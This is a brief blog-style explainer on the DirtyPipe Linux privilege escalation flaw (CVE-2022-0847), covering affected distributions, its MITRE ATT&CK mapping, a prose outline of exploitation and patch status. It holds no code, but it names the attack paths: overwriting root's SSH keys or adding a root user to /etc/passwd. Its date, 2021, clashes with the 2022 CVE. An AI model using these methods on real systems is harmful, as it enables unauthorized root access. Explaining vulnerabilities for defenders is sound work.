Exploiting DirtyPipe aka CVE-2022-0847 - Linux Privilege Escalation Vulnerability | 15 March 2021.


Couple of days ago, a cyber security researcher named Max Kellermann published a a new vulnerability named DirtyPipe with CVE number 2022-0847. This is similar to the DirtyCow vulnerability which was published in 2016.

DirtyPipe is a local privilege escalation vulnerability which affects the Linux kernel starting with version 5.8 and it allows an underprivileged attacker to bypass file permissions, then write arbitrary data to any files in the system where the user has read access. In simple words It is a local privilege escalation vulnerability which allows an adversary to gain root privileges.

Affected systems

Popular linux distributions like Ubuntu, Debain, RedHat are affected. Even android systems are vulnerable. Also it is possible that this vulnerablity can be used to break out of containers.

MITRE ATT&CK mapping

If you would like to map it under MITRE ATT&CK matrix -> Privilege escalation then Exploitation for Privilege escalation. Tacticd ID: T1068.

Exploitation

There are many ways to exploit DirtyPipe using the PoC code. For example, we can write new secure shell keys to the root user. OR we could add a new root user to the etc/passwd file. The demo is based on writing a new user to the etc/passwd file.

Remediation

Most of the major linux distributions have released advisories and patches to mitigate this security issue.